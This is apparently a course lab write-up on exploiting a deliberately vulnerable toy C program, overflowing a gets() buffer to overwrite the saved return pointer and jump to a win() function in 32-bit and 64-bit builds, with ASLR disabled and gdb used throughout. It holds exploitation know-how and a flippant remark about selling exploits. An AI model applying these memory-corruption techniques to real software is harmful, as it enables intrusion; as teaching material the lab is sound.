Linux Buffer Overflow Without Shellcode
Last updated
Last updated
To develop a very simple buffer overflow exploit in Linux, that alters execution to bypass a password. This will give you practice with these techniques:
Writing very simple C code
Compiling with gcc
Debugging with gdb, both 32-bit and 64-bit
Understanding the registers $esp, $ebp, and $eip
Understanding the structure of the stack
Using Python to create simple text patterns
This program asks for a password. The functopn test_pw()
uses simple bitwise manipulations to obfuscate the password comparison, so that the correct password is not literal in the source code. The test_pw()
function reserves room for 10 characters, but reads up to 50 characters from stdin, allowing a buffer overflow. It also returns1, so the win()
function is never executed. Our goal is to print "Fucking Hell! You are HACKERMAN!" by exploiting the buffer overflow.
The first step is to compile the program with the -m32
flag to compile it as a 32-but executable and the -g
switch to add debugging information to the executable. Then we can use the command file
to see information about the executable, and execute it to test its functionality.
With this information we can conclude that it successfully compiled into a 32-bit executable (ELF 32-bit
file), and that the program exits normally with the "FAIL!" message.
The next step is to try to cause a crash on the program.
We did crash the program and received a "Segmentation fault" message which indicates a buffer overflow vulnerability.
Address Space Layout Randomization is a defensive feature to make buffer overflows more difficult utilized by all modern operating systems by default.
If we run the program several times, we can notice that the password address is different every time, as shown below.
For the first part of the book/course, we don't need ASLR so we can turn it off to make things easier.
Now if we run the program multiple times like before, the password address will remain the same every time, as shown below.
Now we can debug the program with gdb
in "quiet" mode ( -q
-> doesn't display banner message), list the source code of the test_pw
function and set a breakpoint after the gets()
call.
Now we can run the program and give it an input of ten A's as the password, then use info registers
to display information about the registers, and use x/12x $esp
to examine the first 12 addresses of the ESP register and analyze the stack frame.
The important registers outlined in green above are:
$eip (extended instruction pointer)
$esp (the top of the stack frame)
$ebp (the bottom of the stack frame)
The first thing to notice is that $eip has an address of <test pq84>
, which means that it is inside the test_pw
function.
$esp is the start (top) of the stack frame, at 0xffffd5c0
in the image above.
$ebp is at 0xffffd5d8
and is the end (bottom) of the stack frame, containing local variables for the test_pw
function, and other type of information.
The password we entered, ten A's, appears on the stack as ten "41" hexadecimal values, outlined in yellow in the image above.
And finally, the word immediately after the stack fram is the save return pointer, outlined in red in the image above. When the function returns, this value is placed into the $eip.
By running the program with a longer password, we can see that the RET
value now contains 0x47474646
. By checking on an ASCII table we can see that these are the hexadecimal codes for "FFGG" in reverse order (little-endian).
By typing continue
, the program throws a "Segmentation fault" error, and we can see that the $eip register now holds 0x47474646
, which means that the characters "FFGG" ended up in $eip.
Since we now have control of the $eip register, we can go to any address we want, and we can use that to go to the win
function.
By typing disassemble win
we can see the assembly code of the win
function, and that it starts at the address 0x5655566e
as shown below.
Now we can quit the debugger and create an exploit file.
To create an exploit file that will take us to the win
function, we just need to create a prefix variable, storing the characters that we used as the password until the "FFGG" that took over the $eip register, and replace those characters for the address at the beginnig of the win
function (0x5655566e
) storing them on another variable, followed by another postfix variable with the rest of the characters. The image below shows the exploit code in Python.
We now need to make the program executable and run it.
The program prints out the letter, with four letters in the middle changed as shown above. The next step is top put the output into a file that we will name attack-pwd32
and confirm that it holds 41 characters with the command ls -l
.
By loading the file in the gdb debugging environment, we can list the source code of the test_pw
function and set a breakpoint after the password input, then run the program with our exploit file as argument.
As we can see above, the RET
value (outlined in green) is now 0x5655566e
which is the address of the start of the win
function. By typing continue
we can see that we get our message from the win
function as desired. Then, the program crashes because we just changed and saved the $eip, but did not adjust also the saved $ebp, so the program cannot return normally from the win()
function.
The debugger is not a perfect simulation of the real shell, and often exploits that work in gdb need some adjustments to work outside of it. In this case, our exploit doesn't need any adjustment because we see the winning message.
To compile the code to 64-bit we just do the same command, but without the -m32
flag.
We can see that the program is an ELF 64-bit
file as expected and that it exits normally with the "FAIL!" message.
We can also make it crash the same way we did with the 32-bit program.
Now we can open the program with gdb
and observe the stack without an overflow to debug it.
We can see the the stack layout is similar to the 32-bit case, but now we have 64-bit registers and addresses as shown above.
The instruction pointer is $rip, $rsp is the start of the stack fram (top of the stack) and $rbp is the end of the stack from (bottom of the stack).
The password we entered, ten A's, appears on the stack as ten "41" hexadecimal values, outlined in yellow in the image above.
The 64-bit word immediately after the stack fram is the saved return pointer, outlined in red in the image above. When the functoon returns, this value is placed into the $eip.
When can now run again the program in gdb
to cause the buffer overflow and examine $rsp.
We can see that the RET
value now contains the hexadecimal codes for "EEFFFFGG" in reverse order. When typing continue the program returns a "Segmentation fault" error. Now we need to follow the same process as with the 32-bit program and find the start of the win()
function's address.
As shown above, the address at the start of the win()
function is 0x00005555555547d0
.
Now we get to the complicated part. Python2 is now deprecated and not updated anymore, which means we should relly on it for exploit development from now on. Because of the numerous exploits created with Python2, new security measures were implemented in Python3 to make it a living hell processing raw bytes, thus using it in exploit development. Although it is still possible to process raw bytes with Python3, I will do this example in Golang. The reason I choose Golang is because it is faster than Python, can be compiled easily for both Windows and Linux operating systems, and since it can be compiled into a binary/executable, it can be reverse engineered, which means the exploits are more valuable (and can be sold lmao).
Now back to the exploit, having the address of the start of the main function we can create our exploit.
We can now build our Go exploit into an executable, and by running it we can see that the program prints out the letters, with eight letters in the middle changed, some of them unprintable, as shown below.
By putting the output into a new file named attackgo-pwd64
we can use the ls -l
command to see that it contains 41 characters, as shown below.
We can now test the exploit in the gdb
debugger. We set a break point after the password is unput and run it with our exploit file.
As we can see, the RET
value (outlined in green) is now the address of the start of the main function (in reverse order -> remember little -endian), as shown above.
By pressing continue
we can see the desired message from the win()
function.